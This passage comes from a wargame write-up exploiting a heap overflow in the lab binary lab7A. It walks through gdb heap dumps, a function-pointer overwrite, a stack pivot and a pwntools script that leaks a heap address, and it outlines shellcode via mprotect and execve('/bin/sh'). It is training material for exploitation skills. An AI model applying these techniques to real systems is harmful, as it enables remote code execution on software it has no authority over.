print message!\\n");\r\n        }\r\n        else if(choice == 5)\r\n        {\r\n            break;  \/\/ exit\r\n        }\r\n        else\r\n            printf("-Invalid choice!\\n");\r\n\r\n        choice = 0;\r\n        puts("");\r\n    }\r\n\r\n    printf("See you tomorrow!\\n");\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n
What does the program do?
\n–> The binary is compiled with the flag -static<\/code> (line 1). This means that the binary has all required functions built in.
\n–> A struct named msg<\/code> is defined (lines 16-21) which contains a function-pointer (print_msg<\/code>), two unsigned integer arrays (xor_pad<\/code> and message<\/code>) and a single unsigned integer member (msg_len<\/code>).
\n–> There is a global array (messages<\/code>) defined to contain pointers to struct msg<\/code> instances (line 23).
\n–> Within the main<\/code> function (line 217) a menu is displayed by calling print_menu<\/code> (line 202) giving the following options:
\n    – Creating \/ Editing \/ Destroying secure message.
\n    – Printing message details.
\n    – Quitting the program.<\/p>\n
–> When 1. Create secure message<\/code> is selected, the function create_message<\/code> is called (line 236).
\n    – create_message<\/code> (line 69) searches for an empty slot in messages<\/code> and allocates memory for a new message (line 89).
\n    – The member-function print_msg<\/code> is set to the address of the function print_message<\/code> (line 91).
\n    – The array new_msg->xor_pad<\/code> is initialized with random values (lines 93-94).
\n    – new_msg->msg_len<\/code> is set by reading a value from the user (line 99).
\n    – If new_msg->msg_len<\/code> is too big, it is set to the maximum amount of bytes which can be stored in new_msg->message<\/code> (lines 109-110).
\n    – The function read<\/code> is used to read a user input from stdin<\/code> to new_msg->message<\/code> (line 114).
\n    – This messages is encrypted by calling encdec_message<\/code> (line 117).
\n    – At last the address of the newly created object new_msg<\/code> is stored in the global array messages<\/code> (line 120).<\/p>\n
–> When selecting 2. Edit secure message<\/code>, the function edit_message<\/code> is called (line 243).
\n    – edit_message<\/code> (line 125) reads an index, zeroes out the message<\/code> member variable and reads in a maximum amount of msg_len<\/code> bytes as a new message (lines 132, 144-145).
\n    – At last the new message is again encrypted using encdec_message<\/code> (line 148).<\/p>\n
–> By choosing 3. Destroy secure message<\/code> the function destroy_message<\/code> is called (line 250).
\n    – destroy_message<\/code> (line 154) also reads an index and zeros out the message<\/code> member variable (lines 161, 171).
\n    – After this the memory for the struct msg<\/code> is deallocated using free<\/code> (line 172).
\n    – The struct pointer within the global array messages<\/code> is then set to NULL<\/code> (line 173).<\/p>\n
–> When 4. Print message details<\/code> is selected, the function print_index<\/code> is called (line 257).
\n    – print_index<\/code> (line 179) yet again reads an index (line 186).
\n    – If the index is valid, the print_msg<\/code> member-function is called passing the whole struct (line 196).
\n    – As the print_msg<\/code> member-function is initialized with print_message<\/code>, this function gets called.
\n    – print_message<\/code> (line 34) prints the XOR pad and the encrypted message.<\/p>\n
–> 5. Quit<\/code> breaks out of the loop (line 262) und thus quits the program.<\/p>\n
There is also an additional readme file stating that this is a remote challenge much like in lab6B<\/a>:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ cat lab7A.readme\r\nlab7A is a remote level much like lab6B. It is running on port 7741.\r\n\r\nnc wargame.server.example 7741 -vvv\r\n<\/pre>\n
Where is the vulnerability within the program?<\/p>\n
This question took me a time. While it has been very easy to spot the vulnerabilities in the first labs, it was quite hard to discover the vulnerability within the code above. After trying around a little bit with the program, I figured out that when choosing a msg_len<\/code> so that 128 < msg_len < 132<\/code> the value will not be reset to the maximum amount of 128<\/code>. The following lines of code are causing this behaviour:<\/p>\n
\r\n    if((new_msg->msg_len \/ BLOCK_SIZE) > MAX_BLOCKS)\r\n        new_msg->msg_len = BLOCK_SIZE * MAX_BLOCKS;\r\n<\/pre>\n
msg_len<\/code> is an unsigned integer and the macro BLOCK_SIZE<\/code> is also an integer (4<\/code>). This means that the division within the if-statement is in whole numbers:<\/p>\n
\r\n>>> 127\/4\r\n31\r\n>>> 128\/4\r\n32\r\n>>> 129\/4\r\n32\r\n>>> 130\/4\r\n32\r\n>>> 131\/4\r\n32\r\n>>> 132\/4\r\n33\r\n<\/pre>\n
As the remains are not taken into account, the if-condition evaluates to true<\/code> only when msg_len<\/code> is bigger than 131<\/code>. This means that we can overflow the member variable message<\/code> by 3 bytes! And what resides within the memory after message<\/code>? Exactly! msg_len<\/code>. Thus we can set msg_len<\/code> do an even bigger number and than use edit_message<\/code> to overflow message<\/code> by a lot of more bytes than just 3 possibly overwriting the next chunk on the heap.<\/p>\n
Fortunately the binary is not compiled as position independent code. Thus we know the address of the global array messages<\/code> which holds the heap pointers:<\/p>\n
\r\n[0x08048d2a]> is~messages\r\nvaddr=0x080eef60 paddr=0x000a6f60 ord=1841 fwd=NONE sz=40 bind=GLOBAL type=OBJECT name=messages\r\n<\/pre>\n
Now let’s try to overflow message<\/code> inspecting the heap using gdb<\/code>:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ gdb .\/lab7A\r\nReading symbols from .\/lab7A...(no debugging symbols found)...done.\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab07\/lab7A\r\n+---------------------------------------+\r\n|        Doom's OTP Service v1.0        |\r\n+---------------------------------------+\r\n|------------ Services Menu ------------|\r\n|---------------------------------------|\r\n| 1. Create secure message              |\r\n| 2. Edit secure message                |\r\n| 3. Destroy secure message             |\r\n| 4. Print message details              |\r\n| 5. Quit                               |\r\n+---------------------------------------+\r\nEnter Choice: 1\r\n-----------------------------------------\r\n-Using message slot #0\r\n-Enter data length: 131\r\n-Enter data to encrypt: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n-Message created successfully!\r\n\r\n+---------------------------------------+\r\n|        Doom's OTP Service v1.0        |\r\n+---------------------------------------+\r\n|------------ Services Menu ------------|\r\n|---------------------------------------|\r\n| 1. Create secure message              |\r\n| 2. Edit secure message                |\r\n| 3. Destroy secure message             |\r\n| 4. Print message details              |\r\n| 5. Quit                               |\r\n+---------------------------------------+\r\nEnter Choice: ^C\r\nProgram received signal SIGINT, Interrupt.\r\n...\r\ngdb-peda$ x\/x 0x080eef60\r\n0x80eef60 <messages>:   0x080f19d8\r\ngdb-peda$ x\/80xw 0x080f19d8-8\r\n0x80f19d0:      0x00000000      0x00000111      0x08048fd3      0x078d572f\r\n0x80f19e0:      0x137db5d1      0x7d14f569      0x2f24ff9b      0x1d0207b8\r\n0x80f19f0:      0x497bca52      0x29524eb3      0x767ac622      0x14af9260\r\n0x80f1a00:      0x0bd24bc5      0x3a9a828a      0x567926e0      0x160526ae\r\n0x80f1a10:      0x1ddc5410      0x39638154      0x24d7bcfe      0x5597d31d\r\n0x80f1a20:      0x2a9eb757      0x1dd2bbce      0x6636ac89      0x69aaaaca\r\n0x80f1a30:      0x758f3b73      0x3599619f      0x530282ba      0x6e053b1c\r\n0x80f1a40:      0x2d114a84      0x3e14113b      0x0f1f7049      0x0284b841\r\n0x80f1a50:      0x301050fe      0x747b4935      0x0a120f71      0x46cc166e\r\n0x80f1a60:      0x523cf490      0x3c55b428      0x6e65beda      0x5c4346f9\r\n0x80f1a70:      0x083a8b13      0x68130ff2      0x373b8763      0x55eed321\r\n0x80f1a80:      0x4a930a84      0x7bdbc3cb      0x173867a1      0x574467ef\r\n0x80f1a90:      0x5c9d1551      0x7822c015      0x6596fdbf      0x14d6925c\r\n0x80f1aa0:      0x6bdff616      0x5c93fa8f      0x2777edc8      0x28ebeb8b\r\n0x80f1ab0:      0x34ce7a32      0x74d820de      0x1243c3fb      0x2f447a5d\r\n0x80f1ac0:      0x6c500bc5      0x7f55507a      0x4e5e3108      0x43c5f900\r\n0x80f1ad0:      0x715111bf      0x353a0874      0x4b534e30      0x000a4141\r\n0x80f1ae0:      0x00000000      0x00020521      0x00000000      0x00000000\r\n0x80f1af0:      0x00000000      0x00000000      0x00000000      0x00000000\r\n0x80f1b00:      0x00000000      0x00000000      0x00000000      0x00000000\r\n<\/pre>\n
I created a new message using the length 131 and entered 130 * “A” (+ a newline character). At the address 0x080eef60<\/code> (messages<\/code>) the first heap pointer is stored: 0x080f19d8<\/code>. I printed the memory beginning at 0x080f19d8-8<\/code> because the heap chunks begins 8 bytes before the memory where the actual data is stored:<\/p>\n
\"\"<\/p>\n
The first 4 bytes of the heap chunk contain the size of the previous chunk. The next 4 bytes contain the size of the chunk itself. Because of byte alignment the three least significant bits would always be zero and are used for flags:
\n–> 0x04: The memory belongs to a thread arena.
\n–> 0x02: The memory was allocated with the function mmap<\/code>.
\n–> 0x01: The previous chunk is in use.<\/p>\n
The chunk right after our chunk beginning at 0x80f1ae0<\/code> is the top of the heap also called the wilderness<\/i>. The value 0x00020521<\/code> indicates that there are 0x20520 = 132384 bytes left for further allocations.<\/p>\n
As we can see within the data of our chunk, we have successfully overwritten msg_len<\/code> with the value 0x000a4141<\/code>:<\/p>\n
\r\n...\r\n0x80f1ad0:      0x715111bf      0x353a0874      0x4b534e30      0x000a4141\r\n...\r\n<\/pre>\n
This means that we can use edit_message<\/code> to overflow message<\/code> by 0xa4141 - 128 = 671937<\/code> bytes. Of course we could set msg_len<\/code> to an even bigger value, but this suffices to overwrite the next chunk on the heap.<\/p>\n
At first let’s create another message generating a second chunk on the heap after the one we already created:<\/p>\n
\r\ngdb-peda$ c\r\nContinuing.\r\n1\r\n-----------------------------------------\r\n-Using message slot #1\r\n-Enter data length: 4\r\n-Enter data to encrypt: AAA\r\n-Message created successfully!\r\n\r\n+---------------------------------------+\r\n|        Doom's OTP Service v1.0        |\r\n+---------------------------------------+\r\n|------------ Services Menu ------------|\r\n|---------------------------------------|\r\n| 1. Create secure message              |\r\n| 2. Edit secure message                |\r\n| 3. Destroy secure message             |\r\n| 4. Print message details              |\r\n| 5. Quit                               |\r\n+---------------------------------------+\r\nEnter Choice: ^C\r\nProgram received signal SIGINT, Interrupt.\r\n...\r\ngdb-peda$ x\/80xw 0x080f19d8-8\r\n0x80f19d0:      0x00000000      0x00000111      0x08048fd3      0x078d572f\r\n0x80f19e0:      0x137db5d1      0x7d14f569      0x2f24ff9b      0x1d0207b8\r\n...\r\n0x80f1ad0:      0x715111bf      0x353a0874      0x4b534e30      0x000a4141\r\n0x80f1ae0:      0x00000000      0x00000111      0x08048fd3      0x1fcab7ac\r\n0x80f1af0:      0x13c8adcd      0x59269ff2      0x5ad6c09d      0x76520b8c\r\n0x80f1b00:      0x3031749d      0x2a925bee      0x64adb511      0x41d6cbd2\r\n<\/pre>\n
The second messages has been stored in the chunk beginning at address 0x80f1ad0<\/code>. The first 4 bytes within the actual data contains the value 0x08048fd3<\/code>. This is the member-function print_msg<\/code> which has been set to print_message<\/code>.<\/p>\n
As the msg_len<\/code> of our first message is big enough, we can now use the edit_message<\/code> function to overwrite the second heap chunk:<\/p>\n
\r\ngdb-peda$ c\r\nContinuing.\r\n2\r\n-----------------------------------------\r\n-Input message index to edit: 0\r\n-Input new message to encrypt: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEE\r\n-Message has been successfully modified!\r\n\r\n+---------------------------------------+\r\n|        Doom's OTP Service v1.0        |\r\n+---------------------------------------+\r\n|------------ Services Menu ------------|\r\n|---------------------------------------|\r\n| 1. Create secure message              |\r\n| 2. Edit secure message                |\r\n| 3. Destroy secure message             |\r\n| 4. Print message details              |\r\n| 5. Quit                               |\r\n+---------------------------------------+\r\nEnter Choice: ^C\r\nProgram received signal SIGINT, Interrupt.\r\n...\r\ngdb-peda$ x\/80xw 0x080f19d8-8\r\n0x80f19d0:      0x00000000      0x00000111      0x08048fd3      0x078d572f\r\n0x80f19e0:      0x137db5d1      0x7d14f569      0x2f24ff9b      0x1d0207b8\r\n...\r\n0x80f1ac0:      0x6c500bc5      0x7f55507a      0x4e5e3108      0x43c5f900\r\n0x80f1ad0:      0x715111bf      0x353a0874      0x4b534e30      0x42424242\r\n0x80f1ae0:      0x43434343      0x44444444      0x45454545      0x1fcab70a\r\n0x80f1af0:      0x13c8adcd      0x59269ff2      0x5ad6c09d      0x76520b8c\r\n0x80f1b00:      0x3031749d      0x2a925bee      0x64adb511      0x41d6cbd2\r\n<\/pre>\n
For the new message I entered \"A\" * 128 + \"BBBBCCCCDDDDEEEE\"<\/code>. As you can see in the heap output, 0x42424242<\/code> (\"BBBB\"<\/code>) overwrote the member variable msg_len<\/code> of the first chunk. 0x43434343<\/code> (\"CCCC\"<\/code>) and 0x44444444<\/code> (\"DDDD\"<\/code>) overwrote the heap meta-data of the second chunk messing up this chunk. Nevertheless the value 0x45454545<\/code> (\"EEEE\"<\/code>) has been written in the first 4 bytes of the actual data of the second chunk. Because this 4 bytes contain the member-function print_msg<\/code>, the program raises a segmentation fault when we try to print the second message:<\/p>\n
\r\ngdb-peda$ c\r\nContinuing.\r\n4\r\n-----------------------------------------\r\n-Input message index to print: 1\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x45454545 ('EEEE')\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0xbffff6cd --> 0x4008000a\r\nEDX: 0x80f1ae8 ("EEEE\\n\\267\\312\037\u036d\\310\023\\362\\237&Y\\235\\300\\326Z\\214\\vRv\\235t10\\356[\\222*\021\\265\\255d\\322\\313\\326A\037\036\\307PD\\205\016i\027wXq\\245a_0u\022G\022z\\365qv\\202\\\\\\226:u[RYe \\302a*\002x.\\351\\337\\354\025\\360\\254\\253\002\\213*\\\\uy\\237\\214@\\377\\203\\246P(dTzR\\317KzP\023&!\\303\\356\\\\\/aH\\206(\021\\262\\267{-\\200\\363'\\r")\r\nESI: 0x0\r\nEDI: 0x80ecfbc --> 0x8069190 (<__stpcpy_sse2>:  mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6f8 --> 0xbffff728 --> 0x8049e70 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff6ac --> 0x8049521 (<print_index+160>:       mov    eax,0x0)\r\nEIP: 0x45454545 ('EEEE')\r\nEFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\nInvalid $PC address: 0x45454545\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff6ac --> 0x8049521 (<print_index+160>:      mov    eax,0x0)\r\n0004| 0xbffff6b0 --> 0x80f1ae8 ("EEEE\\n\\267\\312\037\u036d\\310\023\\362\\237&Y\\235\\300\\326Z\\214\\vRv\\235t10\\356[\\222*\021\\265\\255d\\322\\313\\326A\037\036\\307PD\\205\016i\027wXq\\245a_0u\022G\022z\\365qv\\202\\\\\\226:u[RYe \\302a*\002x.\\351\\337\\354\025\\360\\254\\253\002\\213*\\\\uy\\237\\214@\\377\\203\\246P(dTzR\\317KzP\023&!\\303\\356\\\\\/aH\\206(\021\\262\\267{-\\200\\363'\\r")\r\n0008| 0xbffff6b4 --> 0x0\r\n0012| 0xbffff6b8 --> 0xa ('\\n')\r\n0016| 0xbffff6bc --> 0x80ed240 --> 0xfbad2887\r\n0020| 0xbffff6c0 --> 0x80ed240 --> 0xfbad2887\r\n0024| 0xbffff6c4 --> 0x29 (')')\r\n0028| 0xbffff6c8 --> 0x1\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x45454545 in ?? ()\r\n<\/pre>\n
Great! We successfully completed the first part of the challenge:
\n–> We found a heap overflow vulnerability within the program.
\n–> We succeeded in leveraging this vulnerability to control the instruction pointer (eip<\/code>).<\/p>\n
The next big question is: Where should we jump to?<\/i><\/p>\n
As we figured out, the binary was statically linked. So let’s first check if our favourite function system<\/code> has been built in:<\/p>\n
\r\n[0x08048d2a]> is~system\r\nvaddr=0x080d5660 paddr=0x0008d660 ord=738 fwd=NONE sz=62 bind=LOCAL type=OBJECT name=system_dirs\r\nvaddr=0x080d564c paddr=0x0008d64c ord=739 fwd=NONE sz=16 bind=LOCAL type=OBJECT name=system_dirs_len\r\n<\/pre>\n
Does not look good. Maybe the binary at least contains the string \"\/bin\/sh\"<\/code> and we can create a ROP-chain executing the syscall execve<\/code>?<\/p>\n
\r\n[0x08048d2a]> \/ \/bin\/sh\r\nSearching 7 bytes from 0x08048000 to 0x080eff18: 2f 62 69 6e 2f 73 68\r\n# 6 [0x8048000-0x80eff18]\r\nhits: 0\r\n<\/pre>\n
Nope, no \"\/bin\/sh\"<\/code>.<\/p>\n
While searching through the built-in functions I stumbled upon the following:<\/p>\n
\r\n[0x08048d2a]> is~mprotect\r\nvaddr=0x0806f340 paddr=0x00027340 ord=1248 fwd=NONE sz=37 bind=GLOBAL type=FUNC name=__mprotect\r\nvaddr=0x0806f340 paddr=0x00027340 ord=2227 fwd=NONE sz=37 bind=UNKNOWN type=FUNC name=mprotect\r\n<\/pre>\n
The binary contains the function mprotect<\/code>:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ man mprotect\r\nMPROTECT(2)                                   Linux Programmer's Manual                                  MPROTECT(2)\r\n\r\nNAME\r\n       mprotect - set protection on a region of memory\r\n\r\nSYNOPSIS\r\n       #include <sys\/mman.h>\r\n\r\n       int mprotect(void *addr, size_t len, int prot);\r\n\r\nDESCRIPTION\r\n       mprotect()  changes  protection  for  the calling process's memory page(s) containing any part of the address\r\n       range in the interval [addr, addr+len-1].  addr must be aligned to a page boundary.\r\n\t   \r\n...\r\n<\/pre>\n
mprotect<\/code> can be used to change the protection of memory pages. As for now we cannot execute shellcode in the stack or heap because these segments are marked as RW<\/code> only because NX<\/code> is enabled:<\/p>\n
\r\ngdb-peda$ ! cat \/proc\/$(pidof lab7A)\/maps\r\n08048000-080ec000 r-xp 00000000 fc:00 922475     \/levels\/lab07\/lab7A\r\n080ec000-080ee000 rw-p 000a3000 fc:00 922475     \/levels\/lab07\/lab7A\r\n080ee000-08112000 rw-p 00000000 00:00 0          [heap]\r\nb7ffc000-b7ffd000 rw-p 00000000 00:00 0\r\nb7ffd000-b7ffe000 r-xp 00000000 00:00 0          [vdso]\r\nb7ffe000-b8000000 r--p 00000000 00:00 0          [vvar]\r\nbffdf000-c0000000 rw-p 00000000 00:00 0          [stack]\r\n<\/pre>\n
If we call mprotect<\/code> to make the heap executable, we could store a shellcode in the heap and then redirect the instruction pointer to that shellcode.<\/p>\n
Before we can call mprotect<\/code> we need to leak the address of the heap since we must pass the address as the first argument to mprotect<\/code>.<\/p>\n
Let’s have a look if there is a function built in which can print something for us:<\/p>\n
\r\n[0x08048d2a]> is~puts\r\nvaddr=0x08050bf0 paddr=0x00008bf0 ord=1359 fwd=NONE sz=335 bind=UNKNOWN type=FUNC name=puts\r\n...\r\n<\/pre>\n
Looks good. The function puts<\/code> is located at 0x08050bf0<\/code>. If we pass the fixed address of the global array messages<\/code> (0x80eef60<\/code>) to puts<\/code> at least the address of the first heap pointer will be printed.<\/p>\n
But how do we pass arguments to puts<\/code>? In a stack overflow scenario we could easily overwrite the return address on the stack with a function address and just keep on writing further bytes which will be stored after the return address ending up to be the arguments to the called function.<\/p>\n
With the heap overflow vulnerability we discovered, we can only overwrite one<\/u> function address. If we write more bytes, these will not be stored on the stack, but within the struct object on the heap. Thus this does not help us passing arguments to the function we want to call. In the last level we leveraged the fact that the member-function we could overwrite was being called with an argument which fits our needs. In this level the member-function is called passing the whole struct instance:<\/p>\n
\r\n    messages[i]->print_msg(messages[i]);\r\n<\/pre>\n
As the first member in the struct is the member-function itself, we cannot change this value because it must contain the address of the function we would like to call.<\/p>\n
This means we have to do a little trick. Do you remember level lab5A<\/a>? We introduced a technique called Stack Pivoting<\/i>. When using ROP<\/i> and there is only one gadget we can call, we should call a gadget which changes the stack pointer (esp<\/code>) so that it will point to a region on the stack which we can control. In this region we can place further gadgets which will be called one after another.<\/p>\n
But how do we control a region on the stack? There is no stack overflow vulnerability!? Well, we do not need a vulnerability to modify the stack. All local variables are stored on the stack. And did you recognize the quite unusual way the index is read from the user in print_index<\/code> and all other functions requiring an index?<\/p>\n
\r\n    char numbuf[32];\r\n    unsigned int i = 0;\r\n\r\n    \/* get message index to print *\/\r\n    printf("-Input message index to print: ");\r\n    fgets(numbuf, sizeof(numbuf), stdin);\r\n    i = strtoul(numbuf, NULL, 10);\r\n<\/pre>\n
The buffer for the index (numbuf<\/code>) is 32 byte long! Quite large for an index but perfect to store more gadgets on the stack \ud83d\ude42<\/p>\n
One thing we have to consider is that the buffer must contain a valid index in the first bytes:<\/p>\n
\r\n    if(i >= MAX_MSG || messages[i] == NULL)\r\n    {\r\n        printf("-Invalid message index!\\n");\r\n        return 1;\r\n    }\r\n\r\n    \/* print the message of interest *\/\r\n    messages[i]->print_msg(messages[i]);\r\n<\/pre>\n
If i<\/code> is not a valid index, the member-function print_msg<\/code> does not get called. As the user input is read using fgets<\/code> we can place null-bytes in our input. If we enter \"1\\x00AAAAAAAAAAAA...\"<\/code> for example strtoul<\/code> will return the valid index 1<\/code> but the buffer numbuf<\/code> will still contain the additional \"AAAA...\"<\/code>.<\/p>\n
Summing it up we will do the following to leak the heap address:
\n–> Create a message with the length 131, overwriting msg_len<\/code>.
\n–> Create a second message.
\n–> Edit the first message leveraging the overwritten msg_len<\/code> to overwrite the member-function of the second message with the address of an appropriate stack pivoting gadget.
\n–> Selecting 4. Print message details<\/code> entering index 1 (second message) followed by a null-byte and additional gadgets, which will be stored on the stack.<\/p>\n
The following images illustrates the approach:<\/p>\n
\"\"<\/p>\n
The offset from the stack pointer (esp<\/code>) to numbuf<\/code> at the point of time the print_msg<\/code> function is called can be determined using gdb<\/code>:<\/p>\n
\r\ngdb-peda$ disassemble print_index\r\nDump of assembler code for function print_index:\r\n   ...\r\n   0x0804951c <+155>:   mov    DWORD PTR [esp],edx\r\n   0x0804951f <+158>:   call   eax\r\n   ...\r\n   0x08049538 <+183>:   ret\r\nEnd of assembler dump.\r\ngdb-peda$ b *print_index+158\r\nBreakpoint 1 at 0x804951f\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab07\/lab7A\r\n+---------------------------------------+\r\n|        Doom's OTP Service v1.0        |\r\n+---------------------------------------+\r\n|------------ Services Menu ------------|\r\n|---------------------------------------|\r\n| 1. Create secure message              |\r\n| 2. Edit secure message                |\r\n| 3. Destroy secure message             |\r\n| 4. Print message details              |\r\n| 5. Quit                               |\r\n+---------------------------------------+\r\nEnter Choice: 1\r\n-----------------------------------------\r\n-Using message slot #0\r\n-Enter data length: 4\r\n-Enter data to encrypt: AAA\r\n-Message created successfully!\r\n...\r\nEnter Choice: 4\r\n-----------------------------------------\r\n-Input message index to print: 0\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x8048fd3 (<print_message>:        push   ebp)\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0xbffff6cd --> 0x4008000a\r\nEDX: 0x80f19d8 --> 0x8048fd3 (<print_message>:  push   ebp)\r\nESI: 0x0\r\nEDI: 0x80ecfbc --> 0x8069190 (<__stpcpy_sse2>:  mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6f8 --> 0xbffff728 --> 0x8049e70 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff6b0 --> 0x80f19d8 --> 0x8048fd3 (<print_message>:   push   ebp)\r\nEIP: 0x804951f (<print_index+158>:      call   eax)\r\nEFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8049512 <print_index+145>: mov    edx,DWORD PTR [ebp-0x30]\r\n   0x8049515 <print_index+148>: mov    edx,DWORD PTR [edx*4+0x80eef60]\r\n   0x804951c <print_index+155>: mov    DWORD PTR [esp],edx\r\n=> 0x804951f <print_index+158>: call   eax\r\n   0x8049521 <print_index+160>: mov    eax,0x0\r\n   0x8049526 <print_index+165>: mov    ecx,DWORD PTR [ebp-0xc]\r\n   0x8049529 <print_index+168>: xor    ecx,DWORD PTR gs:0x14\r\n   0x8049530 <print_index+175>: je     0x8049537 <print_index+182>\r\nGuessed arguments:\r\narg[0]: 0x80f19d8 --> 0x8048fd3 (<print_message>:       push   ebp)\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff6b0 --> 0x80f19d8 --> 0x8048fd3 (<print_message>:  push   ebp)\r\n0004| 0xbffff6b4 --> 0x0\r\n0008| 0xbffff6b8 --> 0xa ('\\n')\r\n0012| 0xbffff6bc --> 0x80ed240 --> 0xfbad2887\r\n0016| 0xbffff6c0 --> 0x80ed240 --> 0xfbad2887\r\n0020| 0xbffff6c4 --> 0x29 (')')\r\n0024| 0xbffff6c8 --> 0x0\r\n0028| 0xbffff6cc --> 0x8000a30\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x0804951f in print_index ()\r\ngdb-peda$ x\/32xw $esp\r\n0xbffff6b0:     0x080f19d8      0x00000000      0x0000000a      0x080ed240\r\n0xbffff6c0:     0x080ed240      0x00000029      0x00000000      0x08000a30\r\n0xbffff6d0:     0x080ed240      0x0000000a      0x00000029      0x08050280\r\n0xbffff6e0:     0x080ed240      0x080c085e      0x00000004      0x2b329900\r\n0xbffff6f0:     0x00000000      0x080ecfbc      0xbffff728      0x0804967e\r\n0xbffff700:     0x080c0870      0x00000000      0x00000002      0x00000000\r\n0xbffff710:     0x080ed014      0xbffff7b4      0x00000004      0x2b329900\r\n0xbffff720:     0x00000000      0x080ecfbc      0x08049e70      0x080498ba\r\ngdb-peda$ x\/s $esp+0x1c\r\n0xbffff6cc:     "0\\n"\r\n<\/pre>\n
I set a breakpoint on the call eax<\/code> instruction which call the member-function. In the output of the stack we can see the value 0x08000a30<\/code>. This is the 0 + newline<\/code> we entered. Thus the offset is 0x1c<\/code> before the call. Since the call places an additional item on the stack (the return address) the final offset is 0x20 = 32 byte.<\/p>\n
An appropriate gadget can be found using radare<\/code> or other ROP-tools (see lab6<\/a>). The gadget I used adds 32 byte to esp<\/code> and pop<\/code>s two times. Because this moves esp<\/code> 4 bytes too far, I must append 6 fill bytes ('A'<\/code> in the image) to make esp<\/code> point to the address of puts<\/code>. After the address of puts<\/code> the next return address is stored. Here I simply placed the address of main<\/code> in order to keep the program running. The last item on the stack is the address of messages<\/code> which contains the heap pointers we want to be printed by puts<\/code>.<\/p>\n
The following python-script implements this approach leaking the heap address of the first struct msg<\/code> stored in messages[0]<\/code>:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ cat \/tmp\/exploit_lab7A.py\r\nfrom pwn import *\r\n\r\np = process(".\/lab7A")\r\n\r\n#************************************************\r\n# stage 1\r\n\r\n# create first obj -> overflow 3 bytes changing msglen\r\np.recvuntil("Enter Choice: ")\r\np.sendline("1")                 # 1. Create secure message\r\np.sendline("131")               #    --> len = 131\r\np.sendline("A"*130)             #    --> data = "AAAAAA...\\n"\r\n\r\n# create second obj -> we are going to overwrite this shortly\r\np.recvuntil("Enter Choice: ")\r\np.sendline("1")                 # 1. Create secure message\r\np.sendline("4")                 #    --> len = 4\r\np.sendline("A"*3)               #    --> data = "AAA\\n"\r\n\r\n# overwrite second obj\r\np.recvuntil("Enter Choice: ")\r\np.sendline("2")                 # 2. Edit secure message\r\np.sendline("0")                 #    --> index = 0\r\nexpl = "A"*132\r\nexpl += p32(0x00000000)\r\nexpl += p32(0x00000111)\r\nexpl += p32(0x0807e372) # add esp, 0x20; mov eax, esi; pop ebx; pop esi; ret\r\np.sendline(expl)                #    --> data = expl\r\n\r\n# call function -> leak heap address\r\np.recvuntil("Enter Choice: ")\r\np.sendline("4")                 # 4. Print message details\r\nnum = "1\\x00"\r\nnum += "A"*6\r\nnum += p32(0x8050bf0) # second gadget after pivoting: puts\r\nnum += p32(0x8049569) # return address: main\r\nnum += p32(0x80eef60) # 1st arg puts: messages\r\np.sendline(num)                 #    --> index = 1 (+rop-chain)\r\n\r\n# output contains address of first heap object in messages array\r\nret = p.recvuntil("Enter Choice: ")\r\nmessage_0 = int(ret[0x49:0x4d][::-1].encode("hex"), 16)\r\nlog.info("message_0 = " + hex(message_0))\r\n<\/pre>\n
Despite of ASLR we can now determine the address of messages[0]<\/code> on the heap:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ python \/tmp\/exploit_lab7A.py\r\n[+] Starting program '.\/lab7A': Done\r\n[*] message_0 = 0x83f09d8\r\n[*] Stopped program '.\/lab7A'\r\nlab7A@warzone:\/levels\/lab07$ python \/tmp\/exploit_lab7A.py\r\n[+] Starting program '.\/lab7A': Done\r\n[*] message_0 = 0x891e9d8\r\n[*] Stopped program '.\/lab7A'\r\nlab7A@warzone:\/levels\/lab07$ python \/tmp\/exploit_lab7A.py\r\n[+] Starting program '.\/lab7A': Done\r\n[*] message_0 = 0x9a449d8\r\n[*] Stopped program '.\/lab7A'\r\n<\/pre>\n
What else to do to finally get a shell?
\n–> Store a shellcode which calls execve(\"\/bin\/sh\")<\/code> (see lab3C<\/a>) in the heap using the known heap overflow vulnerability.
\n–> Use the explained approach to call mprotect<\/code> making the heap executable (the required values for the arguments can be determined with gdb<\/code> using the command i proc mappings<\/code>).
\n–> As the return address of the call to mprotect<\/code> set the address of our shellcode within the heap.<\/p>\n
I added detailed comments to the final python-script which uses the remote service running on port 7741:<\/p>\n
